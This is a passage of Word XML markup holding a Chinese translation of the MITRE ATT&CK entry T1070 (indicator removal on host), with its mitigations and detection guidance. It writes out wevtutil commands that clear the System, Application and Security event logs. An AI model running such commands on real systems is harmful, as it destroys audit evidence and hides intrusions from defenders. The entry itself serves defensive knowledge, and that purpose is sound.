      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="53948AC2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04BA4AC2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1070</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D2A8D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A48BC3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4092864A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>清除</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志需要管理员权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5036A58A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B79851C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志分析，主机入侵防御系统，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF4652D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId108" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-93</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDA5FAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ed Williams</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Trustwave</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SpiderLabs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D94E14F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="049C2672" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757BA174" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除或更改主机系统上的生成物，包括日志和捕获的文件，例如隔离的恶意软件。尽管日志的位置和格式会有所不同，但典型的有机系统日志会被捕获为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inux/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ash </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>istory</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/var/log/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDC844" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件干扰</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和其他可用于检测入侵活动的通知可能会损害安全解决方案的完整性，导致事件无法报告。它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>也可能会导致取证分析和事件响应变得更加困难，因为它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺乏足够的数据来确定发生了什么。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1728AC8D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>事件日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E705A84" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件日志是计算机警报和通知记录。微软将事件定义为“系统或程序中需要通知用户或将条目添加到日志中的任何重要事件”。有三个系统定义的事件源：系统、应用和安全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D43C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行账号管理、账号登录和目录服务访问等相关操作的攻击者可以选择清除事件来隐藏其活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D4018" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用以下实用程序命令清除事件日志：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500B1A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wevtutil cl system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC6B2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wevtutil cl application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F985B9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>wevtutil cl security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF6DB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>也可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>其他机制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>清除日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2059CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7425"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="64A95EDF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0021C4EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2A8C5519" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="50734F04" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A9817A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>敏感信息加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11D917D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在本地和传输中混淆</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密事件文件，避免向攻击者提供反馈。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="577AE6A5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72AB3F17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>远程数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA0521D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自动将事件转发到日志服务器或数据存储库，防止攻击者在本地系统上定位和操控数据。尽可能缩短事件报告的时间延迟，避免在本地系统上长时间存储。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="676C4EAC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20EF260E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11939FF6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>适当权限和身份验证来</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护本地存储的事件文件，并通过防止权限升级来限制对手提升权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41130010" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F64F04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544200D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控文件系统来检测是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>不当删除或修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指标文件的行为。例如，删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件日志（通过本机二进制文件、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数或</w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）可能会生成可变事件（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1102</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：“已清除审核日志”）。文件系统中未存储的事件可能需要不同的检测机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03269D96" w14:textId="0FD0D13C" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="0022754D" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>间接</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
